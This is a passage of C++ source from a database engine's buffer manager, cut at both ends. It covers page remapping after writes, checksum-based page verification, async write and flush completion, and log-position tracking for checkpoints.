Assert( !FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) ); // paranoid
}
// save off the basic identity of the page for checking after remap
INT rgiulpOsMmPageMarkers[8]; // worst case = 32 kb DB page / 4 kb OS page
ULONG_PTR rgulpOsMmPageMarkers[8]; // worst case = 32 kb DB page / 4 kb OS page
const CPAGE::PGHDR * const ppghdrPre = (CPAGE::PGHDR*)pbf->pv;
const XECHECKSUM xechkCheckPre = ppghdrPre->checksum; // Don't need full 4 part checksum on large pages b/c change in last 1/2 page trickles up to change primary checksum
const DBTIME dbtimeCheckPre = ppghdrPre->dbtimeDirtied;
const PGNO pgnoCheckPre = ( pbf->icbPage <= icbPage8KB ) ? pbf->pgno : ( ((CPAGE::PGHDR2 *)ppghdrPre)->pgno );
Assert( pgnoCheckPre == pbf->pgno ); // for > 8 KB pages, the pgno off the pghdr2 should match the BF pgno!
Assert( g_rgcbPageSize[pbf->icbPage] % OSMemoryPageCommitGranularity() == 0 ); // ensure 100% coverage of page by the blocks
Assert( OSMemoryPageCommitGranularity() % sizeof( rgulpOsMmPageMarkers[0] ) == 0 ); // ensure 100% coverage of blocks
const INT cosmmpg = g_rgcbPageSize[pbf->icbPage] / OSMemoryPageCommitGranularity();
const INT culpPerBlock = OSMemoryPageCommitGranularity() / sizeof( rgulpOsMmPageMarkers[0] );
AssertPREFIX( _countof(rgiulpOsMmPageMarkers) >= cosmmpg );
AssertPREFIX( _countof(rgulpOsMmPageMarkers) >= cosmmpg );
for ( INT iosmmpage = 0; iosmmpage < cosmmpg; iosmmpage++ )
{
ULONG_PTR * pulpBlock = (ULONG_PTR*)( (BYTE*)pbf->pv + ( iosmmpage * OSMemoryPageCommitGranularity() ) );
INT iulp;
for ( iulp = 0; iulp < culpPerBlock; iulp++ )
{
if ( pulpBlock[iulp] != 0 )
{
rgiulpOsMmPageMarkers[iosmmpage] = iulp;
rgulpOsMmPageMarkers[iosmmpage] = pulpBlock[iulp];
break;
}
}
if( iulp == culpPerBlock )
{
// The entire block is zeros, so use the 0th offset and check for zeros ...
rgiulpOsMmPageMarkers[iosmmpage] = 0;
Expected( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]] == 0 ); // how could've have changed from the loop right above?
rgulpOsMmPageMarkers[iosmmpage] = pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]];
}
AssertSz( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]] == rgulpOsMmPageMarkers[iosmmpage],
"These should be equal, we _just_ set them: %I64x == %I64x",
pulpBlock[rgiulpOsMmPageMarkers[iosmmpage]], rgulpOsMmPageMarkers[iosmmpage] );
}
#ifdef DEBUG
void * pvPageImageCheckPre = NULL;
if ( FIOThread() )
{
// We only do this on the IO thread, so I can just keep the buffer around. Note that there
// is a case through IOChangeFileSizeComplete() where this happens on a different thread, and
// so is not "implicitly locked".
if ( g_pvIoThreadImageCheckCache == NULL )
{
Expected( pbf->icbPage == g_icbCacheMax ); // should be full sized
Assert( pbf->icbPage <= icbPageBiggest ); // full size shouldn't outsize the biggest
// Alloc the maximal we could possibly use ... because we're lazy
g_pvIoThreadImageCheckCache = PvOSMemoryPageAlloc( g_rgcbPageSize[icbPageBiggest], NULL );
}
// This means 99.9% of all page images will be simply cached efficiently without memalloc/free
pvPageImageCheckPre = g_pvIoThreadImageCheckCache;
}
if ( pvPageImageCheckPre == NULL )
{
pvPageImageCheckPre = PvOSMemoryPageAlloc( g_rgcbPageSize[icbPageBiggest], NULL );
// do not want to change from retail behavior, below code silently skips checks if alloc fails ...
}
if ( pvPageImageCheckPre )
{
memcpy( pvPageImageCheckPre, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
}
#endif
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
// remap this to OS FS file cache view mapped page (thus deallocating the private COW'd memory)
// _do not remove the const_ from here. At this point we must return this value so the ESE
// state can be transitioned to errBFIPageRemapNotReVerified. Ideally we'd actually set:
// pbf->err = SHORT( ErrERRCheck( errBFIPageRemapNotReVerified ) ); // similar to errBFIPageNotVerified
// here, but we are currently at the beginning of BFIAsyncWriteComplete() and the
// error must stay in the wrnBFPageFlushPending state until we're done. So up in
// BFIAsyncWriteComplete we just use this errBFIPageRemapNotReVerified error as the
// signal error if we successfully remapped.
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ); // just double checking
const ERR errMapOp = ( pbf->bfat == bfatPageAlloc ) ?
pfapi->ErrMMCopy( OffsetOfPgno( pbf->pgno ), g_rgcbPageSize[pbf->icbPage], &pvFreshMapPage ) :
pfapi->ErrMMRevert( OffsetOfPgno( pbf->pgno ), pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// _do not remove the const_ from here (see above comment), THIS value must be returned.
const BOOL fRemappedRet = ( errMapOp >= JET_errSuccess );
FOSSetCleanupState( fCleanUpStateSaved );
if ( pbf->bfat == bfatPageAlloc )
{
if ( errMapOp >= JET_errSuccess )
{
Enforce( fRemappedRet );
Enforce( pvFreshMapPage );
Assert( pbf->pv != pvFreshMapPage ); // that would be odd ...
// Complete "re"-map for bfatPageAlloc case
OSMemoryPageFree( pbf->pv );
pbf->pv = pvFreshMapPage;
pbf->bfat = bfatViewMapped;
}
else
{
Assert( !fRemappedRet );
Assert( pvFreshMapPage == NULL ); // or we'll leak a mapping
Expected( ppghdrPre == (CPAGE::PGHDR*)pbf->pv ); // no success, no change
}
}
else
{
Expected( ppghdrPre == (CPAGE::PGHDR*)pbf->pv ); // shouldn't be able to change as true-remapping/revert doesn't require new VA address
}
if ( fRemappedRet )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( !FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
// we want to protect ourselves from an exception when we deref ppghdrPost = (CPAGE::PGHDR*)pbf->pv;
// below, so I am going to force a "read" here. note: this probably won't be an actual read IO as
// it should be freshly cached in the OS MM / FS cache due to the fact they just completed a write
// to this page.
#ifdef DEBUG
// try to prove it probably isn't a real read (per immediately previous comment)
AtomicAdd( &g_cRemapsSuccessful, 1 );
if ( pvFreshMapPage )
{
AtomicAdd( &g_cRemapsOfPageAlloc, 1 );
}
else
{
AtomicAdd( &g_cRemapsOfViewMapped, 1 );
}
if ( !FOSMemoryPageResident( pbf->pv, CbBFIBufferSize( pbf ) ) )
{
AtomicAdd( &g_cRemapsNonResident, 1 );
}
// if we have done a fair number of remaps we really shouldn't have very many non-resident pages
// here or we are in serious concern for single threading our whole IO sub-system.
// Amazingly, the OS is aggressive enough about making sure recently written pages are not
// resident when we don't open the file with actual file-cache / buffering!
// Assert( g_cRemapsSuccessful < 1000 || g_cRemapsNonResident < g_cRemapsSuccessful / 3 || !BoolParam( JET_paramEnableFileCache ) );
#endif
Expected( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
errReRead = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ),
(BYTE*)pbf->pv,
CbBFIBufferSize( pbf ),
IFileAPI::FileMmIoReadFlag( IFileAPI::fmmiorfKeepCleanMapped | IFileAPI::fmmiorfPessimisticReRead ) );
}
else
{
// else the price of failure is nothing really, we just use more memory ... we should
// double check the memory state though ...
// Note: as a matter of normal course this can actually happen on downlevel systems that
// don't support OS remapping w/ JET_errInvalidParameter.
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( pbf->bfdf == bfdfClean || FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
OnDebug( AtomicAdd( &g_cRemapsFailed, 1 ) );
}
// check that the re-mapped page has the same basic identity before remapping (or that we'll
// at least that we've remapped and we'll set errBFIPageRemapNotReVerified).
// At this point we have tried to remap and so entered one of four states with a few sublties, cases:
// 1. Remap succeeded, and the page is a perfect copy. A-ok.
// 2. Remap failed, page should be un-altered.
// 3. Remap succeded or failed, but the page was altered, doesn't pass page-verification.
// 4. Remap succeded or failed, but the page was altered, and still passes page-verification.
//
// The last two cases are defense in depth for our engine, and we believe will be super rare
// cases, but need special treatement
// Case #3 - perhaps even just because it was paged out by OS, and re-read retrieves us a bad disk
// page .. in this case we will return true because we did remap, and this will get
// errBFIPageRemapNotReVerified set in the BF error state so clients can validate it.
// Casae #4 - This is the most nefarious case, the page is altered, but still checksums, this
// will most likely mean we lost an update / appear as lost flush!!! Ugh.
//
// So this yields logic like this ... first check if the page is altered, if altered, checksum
// the page, if page is valid / still checksums (case #4) Enforce and hope recovery can fix, if it
// is not valid (case #3) trundle along and let write complete fix up the error state to
// errBFIPageRemapNotReVerified.
//
if ( errReRead < JET_errSuccess )
{
// If we failed the read, likely a 2nd effort to deref that memory (the effort to
// check the page image isn't corrupted, in the below else) will also except so we
// would crash. But since we should be remapped in this case, then we should be
// safe to just let this through and set errBFIPageRemapNotReVerified, it heals
// all sins!
Enforce( fRemappedRet );
}
else
{
const CPAGE::PGHDR * const ppghdrPost = (CPAGE::PGHDR*)pbf->pv;
const PGNO pgnoCheckPost = ( pbf->icbPage <= icbPage8KB ) ? pbf->pgno : ( ((CPAGE::PGHDR2 *)ppghdrPost)->pgno );
BOOL fMarkersSame = fTrue;
for ( INT iosmmpage2 = 0; iosmmpage2 < cosmmpg; iosmmpage2++ )
{
ULONG_PTR * pulpBlock = (ULONG_PTR*)( (BYTE*)pbf->pv + ( iosmmpage2 * OSMemoryPageCommitGranularity() ) );
fMarkersSame = fMarkersSame && ( pulpBlock[rgiulpOsMmPageMarkers[iosmmpage2]] == rgulpOsMmPageMarkers[iosmmpage2] );
Assert( fMarkersSame );
}
// if we actually have a mismatch after map, we'll checksum the page on the IO
// thread (which should avoid becoming a bottleneck, b/c this should be very rare)
if ( FBFIDatabasePage( pbf ) ||
xechkCheckPre != ppghdrPost->checksum ||
pgnoCheckPre != pgnoCheckPost ||
xechkCheckPre != ppghdrPost->checksum ||
dbtimeCheckPre != ppghdrPost->dbtimeDirtied ||
!fMarkersSame )
{
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
CPageValidationLogEvent validationaction( pbf->ifmp, CPageValidationLogEvent::LOG_NONE, BUFFER_MANAGER_CATEGORY );
errCheckPage = cpage.ErrValidatePage( pgvfExtensiveChecks | pgvfDoNotCheckForLostFlush, &validationaction );
// should we check flush map here?
}
if ( errCheckPage >= JET_errSuccess || !fRemappedRet )
{
// Ok, so if the page actually validates (or we don't think we remapped) ... and we are
// mismatched, then we have a real problem (probably a lost flush) and we should tear
// down the process
// just in case we map to a different page or something cray cray (then we HAVE to die
// as this is an OS bug causing a likely consistency / lost flush problem).
Enforce( xechkCheckPre == ppghdrPost->checksum );
Enforce( dbtimeCheckPre == ppghdrPost->dbtimeDirtied );
Enforce( pgnoCheckPre == pgnoCheckPost );
Enforce( fMarkersSame );
}
// else if the page doesn't validate that's actually fine because in BFIAsyncWriteComplete
// we'll be setting the page status to errBFIPageRemapNotReVerified
}
#ifdef DEBUG
// page image copy should be consistent from what we got before (double and triple check) ...
if ( errReRead >= JET_errSuccess && // must have successfully read to do this level of validation in RFS IO tests
pvPageImageCheckPre )
{
const CPAGE::PGHDR * const ppghdrPreCopy = (CPAGE::PGHDR*)pvPageImageCheckPre;
AssertSz( xechkCheckPre == ppghdrPreCopy->checksum, "Remap checksum mismatch: 0x%I64x != 0x%I64x, errs = %d / %d",
xechkCheckPre, (XECHECKSUM)ppghdrPreCopy->checksum, errReRead, errCheckPage );
AssertSz( dbtimeCheckPre == ppghdrPreCopy->dbtimeDirtied, "Remap dbtime mismatch: %I64d != %I64d, errs = %d / %d",
dbtimeCheckPre, (DBTIME)ppghdrPreCopy->dbtimeDirtied, errReRead, errCheckPage );
AssertSz( 0 == memcmp( pvPageImageCheckPre, pbf->pv, g_rgcbPageSize[pbf->icbPage] ), "Remap page image mismatch: %I64x != %I64x, errs = %d / %d",
pvPageImageCheckPre, pbf->pv, errReRead, errCheckPage );
if ( pvPageImageCheckPre != g_pvIoThreadImageCheckCache )
{
// means we're not the IO thread (or first alloc failed and 2nd succeeded above), needs freeing
OSMemoryPageFree( pvPageImageCheckPre );
}
// Note g_pvIoThreadImageCheckCache is released in BFTerm()
}
if ( errReRead >= JET_errSuccess && // must have successfully read to do this level of validation in RFS IO tests
FBFIDatabasePage( pbf ) )
{
CPAGE cpage;
CPageValidationNullAction nullaction;
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
CallS( cpage.ErrValidatePage( pgvfDoNotCheckForLostFlush, &nullaction ) );
}
#endif // DEBUG
return fRemappedRet;
}
void BFIAsyncWriteComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
const IFMP ifmp = pbf->ifmp;
FMP * const pfmp = &g_rgfmp[ ifmp ];
Assert( pbf->err == wrnBFPageFlushPending );
Expected( err <= JET_errSuccess ); // no expected warnings
// reset the I/O context, since the operation is officially completed.
BFIResetIOContext( pbf );
// trace that we have just written a page
BFITraceWritePage( pbf, tc );
Assert( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 );
Enforce( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 ); // just for insurance
// Update the flush map with the proper flush state.
if ( FBFIDatabasePage( pbf ) )
{
if ( err >= JET_errSuccess )
{
CPAGE::PageFlushType pgft = CPAGE::pgftUnknown;
DBTIME dbtime = dbtimeNil;
const LONG cbBuffer = g_rgcbPageSize[ pbf->icbBuffer ];
CFlushMap* const pfm = g_rgfmp[ pbf->ifmp ].PFlushMap();
OnDebug( const BOOL fIsPagePatching = ( tc.etc.iorReason.Iorp() == IOREASONPRIMARY( iorpPatchFix ) ) );
OnDebug( const BOOL fIsFmRecoverable = pfm->FRecoverable() );
CPAGE cpage;
const LONG cbPage = g_rgcbPageSize[ pbf->icbPage ];
Assert( cbBuffer == cbPage );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, cbBuffer );
dbtime = cpage.Dbtime();
if ( !FUtilZeroed( (BYTE*)pbf->pv, cbBuffer ) && ( dbtime != dbtimeShrunk ) && ( dbtime != dbtimeRevert ) )
{
pgft = cpage.Pgft();
}
cpage.UnloadPage();
Assert( !( fIsPagePatching && fIsFmRecoverable ) ); // otherwise, we'd need to sync flush the flush map
pfm->SetPgnoFlushType( pbf->pgno, pgft, dbtime );
}
}
// if we're in view cache, remap this page to minimize our private working set
BOOL fRemappedWriteLatched = fFalse;
if ( err >= JET_errSuccess &&
( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ) )
{
// we generally eschew more work on completion because we have a single completion
// thread and we don't want to hold up IO processing, however there are no high-scale
// large server clients using ViewCache, so we're going to let this fly for now.
OnDebug( AtomicAdd( &g_cRemapsConsidered, 1 ) );
if ( pbf->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess )
{
// Technically could avoid if bfdf == bfdfClean from clean page overwritting, should we?
if ( FBFICacheRemapPage( pbf, pfapi ) )
{
fRemappedWriteLatched = fTrue;
}
else
{
// shoot failed, but no point in keeping this then ...
pbf->sxwl.ReleaseWriteLatch();
Assert( !fRemappedWriteLatched );
}
}
else
{
OnDebug( AtomicAdd( &g_cRemapsSkippedByLatchContention, 1 ) );
}
}
Assert( fRemappedWriteLatched || pbf->sxwl.FNotOwner() );
Assert( !fRemappedWriteLatched || pbf->sxwl.FOwnWriteLatch() );
// release our reference count on the range lock now that our write
// has completed
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFAsyncCompleteRangeNotLocked" );
pfmp->LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
// write was successful
if ( err >= JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] written to disk (dbtime: %s)",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatUnsigned( (ULONG_PTR)((DBTIME*)pbf->pv)[ 1 ] ) ) );
// versioned pages will no longer be accessed once flushed so we mark them
// as supercold to get them out of the cache quickly
if ( pbf->fOlderVersion )
{
BFIMarkAsSuperCold( pbf, fFalse );
}
}
// update our page write stats
if ( pbf->fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
if ( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesCoalescedWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
#ifdef ENABLE_CLEAN_PAGE_OVERWRITE
if ( pbf->fSuspiciouslySlowRead )
{
// we log this here as it is closest to the point we actually "repaired" the issue.
WCHAR wszPgno[ 64 ];
OSStrCbFormatW( wszPgno, sizeof(wszPgno), L"%d", pbf->pgno );
// log event
const WCHAR * rgwsz [2] = { wszPgno, g_rgfmp[ifmp].WszDatabaseName() };
UtilReportEvent(
eventWarning,
BUFFER_MANAGER_CATEGORY,
SUSPECTED_BAD_BLOCK_OVERWRITE_ID,
_countof( rgwsz ), rgwsz );
}
#endif
Assert( !fRemappedWriteLatched || err >= JET_errSuccess ); // we can't paste the right error if there was an IO error.
// declare success or the appropriate I/O error or that remapped (and needs page validation)
ERR errSignal = ( err < JET_errSuccess ) ?
( err ) :
( fRemappedWriteLatched ? errBFIPageRemapNotReVerified : err );
BFIWriteSignalSetComplete( pbf, errSignal ); // lost the "virtual latch" ..
// NOTE: This effectively gives this BF to any other thread that might latch it, so no more pbf usage
// (Except for fWriteLatched == fTrue / which only happens under JET_paramEnableViewCache)
if ( fRemappedWriteLatched )
{
Assert( ErrBFIWriteSignalState( pbf ) == errBFIPageRemapNotReVerified );
// now (after write signal set complete) it is ok to release the write latch for remapped pages
pbf->sxwl.ReleaseWriteLatch();
}
// NOTE: Now definitely no pbf usage. :)
// signal appropriate threads more work ...
if ( tc.etc.iorReason.Iorp() == iorpBFCheckpointAdv &&
( ( err < JET_errSuccess ) || ( grbitQOS & qosIOCompleteWriteGameOn ) ) )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ifmp], bfcpdmrRequestIOThreshold );
}
// request avail pool maintenance to possibly reclaim the page we just
// wrote
if ( tc.etc.iorReason.Iorp() == iorpBFAvailPool )
{
CallS( ErrBFIMaintAvailPoolRequest( bfmaprtAsync ) );
}
if ( tc.etc.iorReason.Iorp() == iorpBFDatabaseFlush )
{
g_asigBFFlush.Set();
}
}
// Finalizes a flush on a pending (err == wrnBFPageFlushPending) BF that has
// completed IO (pWriteSignalComplete == 0 / NULL or positive value).
//
// If this finalization is being performed from a path that has no data
// encumberance (fUnencumberedPath = fTrue) then the page may be invasively
// re-organized during clean page.
//
void BFIFlushComplete( _Inout_ const PBF pbf, _In_ const BFLatchType bfltHave, _In_ const BOOL fUnencumberedPath, _In_ const BOOL fCompleteRemapReVerify, _In_ const BOOL fAllowTearDownClean )
{
const IFMP ifmp = pbf->ifmp;
FMP * const pfmp = &g_rgfmp[ ifmp ];
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// grab the write signal error and reset the signal ...
Assert( wrnBFPageFlushPending == pbf->err );
Assert( !FBFIUpdatablePage( pbf ) );
Assert( pbf->pWriteSignalComplete <= 0xFFFF ); // should be self consistent
ERR err = ErrBFIWriteSignalState( pbf ); // grab the error ...
BFIWriteSignalReset( pbf ); // reset the error
Assert( wrnBFPageFlushPending != err );
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// extra validation
// Should still checksum correctly ... note, we may not have enough stack space here,
// and so if we find we always end up without a page image, we can move this check to
// the IO thread / BFIAsyncWriteComplete where we certainly have enough space ...
// We haven't completed the flush state transition at this point yet, so skip the check
// for uninitialized pages because we could throw bogus lost flush errors.
if ( !FBFIBufferIsZeroed( pbf ) )
{
CallS( ErrBFIVerifyPageSimplyWork( pbf ) );
}
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
// Now that we checksum under the page protection, we should never hit it. if we don't
// we might consider turning off page protection to see if we hit it then.
if ( !FBFICacheViewCacheDerefIo( pbf ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() )
{
OSMemoryPageUnprotect( pbf->pv, CbBFIBufferSize( pbf ) );
}
#endif
Assert( CmpLgpos( pbf->lgposModify, pfmp->LgposWaypoint() ) <= 0 );
// write was successful
if ( err >= JET_errSuccess || err == errBFIPageRemapNotReVerified )
{
// validate errors
Assert( err == JET_errSuccess || err == errBFIPageRemapNotReVerified || err == wrnBFPageFlushPending );
Expected( pbf->err >= JET_errSuccess );
Expected( pbf->err == JET_errSuccess || pbf->err == wrnBFPageFlushPending );
// reset BF to "cleaned" status
const BFCleanFlags bfcf = BFCleanFlags( ( fUnencumberedPath ? bfcfAllowReorganization : bfcfNone ) | ( fAllowTearDownClean ? bfcfAllowTearDownClean : bfcfNone ) );
BFICleanPage( pbf, bfltHave, bfcf );
// now process if the page has been remapped and needs reverification
if ( err == errBFIPageRemapNotReVerified )
{
pbf->err = SHORT( errBFIPageRemapNotReVerified );
}
if ( fCompleteRemapReVerify /* only false for BFPurge / detach */ &&
pbf->err == errBFIPageRemapNotReVerified )
{
TraceContextScope tcScope( iorpBFRemapReVerify );
err = ErrBFIValidatePage( pbf, bfltHave, CPageValidationLogEvent::LOG_ALL & ~CPageValidationLogEvent::LOG_UNINIT_PAGE, *tcScope );
Assert( pbf->err != errBFIPageRemapNotReVerified );
}
}
// write was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
}
// indicate flushed, so later stats update correctly
pbf->fFlushed = fTrue;
}
// Time Dependencies
// critical section protecting all dependency trees
CCriticalSection g_critBFDepend( CLockBasicInfo( CSyncBasicInfo( szBFDepend ), rankBFDepend, 0 ) );
// Transaction/Logging Support
void BFISetLgposOldestBegin0( PBF pbf, LGPOS lgpos, const TraceContext& tc )
{
LGPOS lgposOldestBegin0Last = lgposMax;
Assert( pbf->sxwl.FOwnWriteLatch() ||
( pbf->sxwl.FOwnExclusiveLatch() && pbf->fWARLatch ) );
Assert( pbf->bfdf >= bfdfDirty );
Assert( FBFIUpdatablePage( pbf ) );
// all pages with an OB0 must be dirty. this is because we don't want untidy
// pages to stick around and hold up the checkpoint as we normally don't want
// to flush them
BFIDirtyPage( pbf, bfdfDirty, tc );
// save the current lgposOldestBegin0 for this BF
LGPOS lgposOldestBegin0 = pbf->lgposOldestBegin0;
// if the specified lgposBegin0 is earlier than the current lgposOldestBegin0
// then reset the BF's lgposOldestBegin0
if ( CmpLgpos( &lgposOldestBegin0, &lgpos ) > 0 )
{
BFIResetLgposOldestBegin0( pbf, fTrue );
}
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
// the new lgposOldestBegin0 is earlier than the current lgposOldestBegin0
if ( CmpLgpos( &lgposOldestBegin0, &lgpos ) > 0 )
{
pfmp->EnterBFContextAsReader();
OnDebug( pfmp->Pinst()->m_plog->CbLGOffsetLgposForOB0( lgpos, lgpos ) );
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp && pbffmp->fCurrentlyAttached );
#ifdef DEBUG
// restrict check to recovery only, for performance reasons and because it is where we are more likely to violate this
// anyways.
if ( pfmp->Pinst()->m_plog->FRecovering() )
{
// Make sure the lgposOldestBegin0 we are setting in this BF is consistent with the required range stamped in the DB header.
BFIAssertReqRangeConsistentWithLgpos( pfmp, lgpos, lgposMin, "SetLgposOB0" );
}
#endif // DEBUG
// set the new lgposOldestBegin0
pbf->lgposOldestBegin0 = lgpos;
// try to insert ourself into the OB0 index
BFOB0::CLock lock;
pbffmp->bfob0.LockKeyPtr( BFIOB0Offset( pbf->ifmp, &lgpos ), pbf, &lock );
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrInsertEntry( &lock, pbf );
pbffmp->bfob0.UnlockKeyPtr( &lock );
// we failed to insert ourelf into the OB0 index
if ( errOB0 != BFOB0::ERR::errSuccess )
{
Assert( errOB0 == BFOB0::ERR::errOutOfMemory ||
errOB0 == BFOB0::ERR::errKeyRangeExceeded );
// insert ourself into the OB0 index overflow list. this always
// succeeds but isn't good because it is unordered
pbf->fInOB0OL = fTrue;
pbffmp->critbfob0ol.Enter();
pbffmp->bfob0ol.InsertAsNextMost( pbf );
pbffmp->critbfob0ol.Leave();
}
// get the cached value for the oldest OB0 in the cache
lgposOldestBegin0Last = pbffmp->lgposOldestBegin0Last;
pfmp->LeaveBFContextAsReader();
}
// request checkpoint depth maintenance if the checkpoint is too deep
if ( CmpLgpos( lgposOldestBegin0Last, lgposMax ) )
{
// get the most recent log record
LOG* const plog = pfmp->Pinst()->m_plog;
const LGPOS lgposNewest = plog->LgposLGLogTipNoLock();
const ULONG_PTR cbCheckpointDepthMax = pfmp->Pinst()->m_fCheckpointQuiesce ? 0 : pfmp->Pinst()->m_plog->CbLGDesiredCheckpointDepth();
const ULONG_PTR cbCheckpointDepth = (ULONG_PTR)plog->CbLGOffsetLgposForOB0( lgposNewest, lgposOldestBegin0Last );
if ( cbCheckpointDepth > cbCheckpointDepthMax )
{
BFIMaintCheckpointDepthRequest( pfmp, bfcpdmrRequestOB0Movement );
}
}
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] lgposOldestBegin0 %s -> %s",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatLgpos( lgposOldestBegin0 ),
OSFormatLgpos( lgpos ) ) );
}
void BFIResetLgposOldestBegin0( PBF pbf, BOOL fCalledFromSet )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// save the current lgposOldestBegin0 for this BF
LGPOS lgposOldestBegin0 = pbf->lgposOldestBegin0;
// delete ourself from the Oldest Begin 0 index or the overflow list
if ( CmpLgpos( &lgposOldestBegin0, &lgposMax ) )
{
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp ); // pbffmp->fCurrentlyAttached doesn't matter for resetting logpos OB0
if ( pbf->fInOB0OL )
{
pbf->fInOB0OL = fFalse;
pbffmp->critbfob0ol.Enter();
pbffmp->bfob0ol.Remove( pbf );
pbffmp->critbfob0ol.Leave();
}
else
{
BFOB0::CLock lock;
pbffmp->bfob0.LockKeyPtr( BFIOB0Offset( pbf->ifmp, &lgposOldestBegin0 ), pbf, &lock );
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrDeleteEntry( &lock );
Assert( errOB0 == BFOB0::ERR::errSuccess );
pbffmp->bfob0.UnlockKeyPtr( &lock );
}
pfmp->LeaveBFContextAsReader();
pbf->lgposOldestBegin0 = lgposMax;
}
if ( !fCalledFromSet && CmpLgpos( &lgposOldestBegin0, &lgposMax ) )
{
OSTrace( JET_tracetagBufferManager,
OSFormat( "%s: [%s:%s] lgposOldestBegin0 %s -> %s",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatLgpos( lgposOldestBegin0 ),
OSFormatLgpos( lgposMax ) ) );
}
}
void BFISetLgposModifyEx( PBF pbf, const LGPOS lgpos )
{
// we should either reset or move forward only.
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
Assert( pfmp );
#ifdef DEBUG
// restrict check to recovery only, for performance reasons and because it is where we are more likely to violate this
// anyways.
if ( ( pfmp->Pinst() != pinstNil ) && pfmp->Pinst()->m_plog->FRecovering() )
{
// Make sure the lgposModify we are setting in this BF is consistent with the required range stamped in the DB header.
BFIAssertReqRangeConsistentWithLgpos( pfmp, lgposMax, lgpos, "SetLgposModify" );
}
#endif // DEBUG
// Create a local copy, so, we won't get affected if it changes.
// Do it atomically because removing undo info may change it
// without a latch while a regular user thread might be reading
// the value (the read is also atomic).
LGPOS lgposOld;
if ( CmpLgpos( lgpos, lgposMin ) == 0 )
{
// Taking the max won't work in this case because we're resetting lgposModify.
// Though in this case, we don't foresee such a conflict because if we're
// resetting lgposModify (i.e., the page is being marked as clean), we don't
// expect this buffer to have any associated entries in the version store.
Assert( pbf->prceUndoInfoNext == prceNil );
lgposOld = pbf->lgposModify.LgposAtomicExchange( lgpos );
}
else
{
lgposOld = pbf->lgposModify.LgposAtomicExchangeMax( lgpos );
Assert( CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgpos ) >= 0 );
}
if ( lgposOld.lGeneration != lgpos.lGeneration )
{
const TLS* const pTLS = Ptls();
bool fLocalLock = false;
if ( !pTLS->PFMP() )
{
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
pfmp->EnterBFContextAsReader();
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
fLocalLock = true;
}
else
{
// upper functions has already locked BFFMP context
Assert( pTLS->PFMP() == pfmp );
}
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
